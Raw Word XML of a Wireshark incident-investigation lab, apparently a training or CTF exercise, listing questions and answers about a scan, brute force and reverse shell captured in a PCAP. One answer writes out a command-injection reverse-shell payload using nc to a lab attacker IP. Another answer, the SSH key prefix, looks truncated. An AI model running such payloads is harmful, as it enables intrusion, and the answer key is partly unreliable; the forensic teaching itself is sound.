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left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:cs="Aptos Display" w:eastAsia="Aptos Display"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-10"/>
          <w:position w:val="0"/>
          <w:sz w:val="5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-10"/>
          <w:position w:val="0"/>
          <w:sz w:val="56"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark Investigation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Your organization's Security Operations Center (SOC) has detected suspicious network activity targeting one of your internal web servers. The incident response team has provided you with a packet capture (PCAP) file containing the relevant network traffic.</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Your task is to analyze the PCAP file using Wireshark to understand the full scope of the attack and answer the following questions.</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Download the attack.pcap file from the Files tab and use Wireshark to investigate.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ptos Display" w:hAnsi="Aptos Display" w:cs="Aptos Display" w:eastAsia="Aptos Display"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-10"/>
          <w:position w:val="0"/>
          <w:sz w:val="5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-10"/>
          <w:position w:val="0"/>
          <w:sz w:val="56"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Questions: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01</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="278"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:cs="Aptos Display" w:eastAsia="Aptos Display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32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2"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">What is the IP address of the attacker?</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:cs="Aptos Display" w:eastAsia="Aptos Display"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="32"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Format: IPv4 address (e.g., 10.0.0.1)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 172.28.0.20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02</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="278"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:cs="Aptos Display" w:eastAsia="Aptos Display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auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="32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2"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">What is the IP address of the victim machine (web server)?</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:cs="Aptos Display" w:eastAsia="Aptos Display"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="32"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Format: IPv4 address (e.g., 10.0.0.1)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172.28.0.10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03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type of port scanning technique did the attacker use during reconnaissance?</w:t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Hint: Look at the TCP flags in the initial scanning packets.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Format: Two words (e.g., "FIN scan", "ACK scan")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 SYN scan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04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is the full version string of the web server software running on the victim?</w:t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Hint: Check HTTP response headers.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Format: Full server header value (e.g., nginx/1.18.0)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 Apache/2.4.65 (Debian)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05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tool did the attacker use for port scanning and service detection?</w:t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Hint: Look for distinctive packet patterns or user-agent strings.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Format: Tool name (lowercase)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Answer:nmap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06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How many HTTP 404 (Not Found) responses were generated during the directory bruteforce attack?</w:t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Hint: Filter for HTTP response code 404.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Format: Number only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 62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07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hidden PHP page did the attacker discover during directory bruteforcing (besides index.php)?</w:t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Hint: Look for HTTP 200 responses to unusual URIs.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Format: filename.php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Answer:admin.php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08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tool did the attacker use for directory/file bruteforcing?</w:t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Hint: Check the User-Agent header in HTTP requests during the directory enumeration phase.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Format: Tool name (lowercase)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 gobuster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09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username did the attacker target during the credential bruteforce attack?</w:t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Hint: Look at POST request body data for login attempts.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Format: username (lowercase)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 admin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10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How many failed login attempts were made by the credential bruteforce tool?</w:t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Hint: Count POST requests to the login page that resulted in failed authentication.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Format: Number only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 29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11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password did the attacker successfully use to authenticate?</w:t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Hint: Look for the POST request that resulted in successful login (different response).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Format: Exact password string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 securep@ss123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12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was the full command injection payload the attacker used to establish a reverse shell?</w:t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Hint: Look at POST data sent to the vulnerable page.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Format: The complete payload value from the POST parameter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 127.0.0.1; nc 172.28.0.20 4444 -e /bin/bash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13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port did the attacker use to receive the reverse shell connection?</w:t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Hint: Look at the command injection payload or outbound connections from victim.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Format: Port number only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4444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14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source port did the victim machine use when connecting back to the attacker's reverse shell listener?</w:t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Hint: Filter for TCP connections to port 4444 and check the source port.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Format: Port number only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 54762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15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attacker modified a file to establish persistence on the machine. What file was edited for this purpose?</w:t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Hint: Follow the TCP stream of the reverse shell to see commands executed.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Format: Filename only (not full path)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 authorized_keys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[Wireshark Investigation] Question 16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are the first 16 characters of the attacker's malicious SSH key?</w:t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Hint: The key may be Base64 encoded. Follow the reverse shell stream and decode any obfuscated commands.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Format: First 16 characters of the SSH key (after "ssh-rsa ")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Answer: AAAB3NzaC1yc2EA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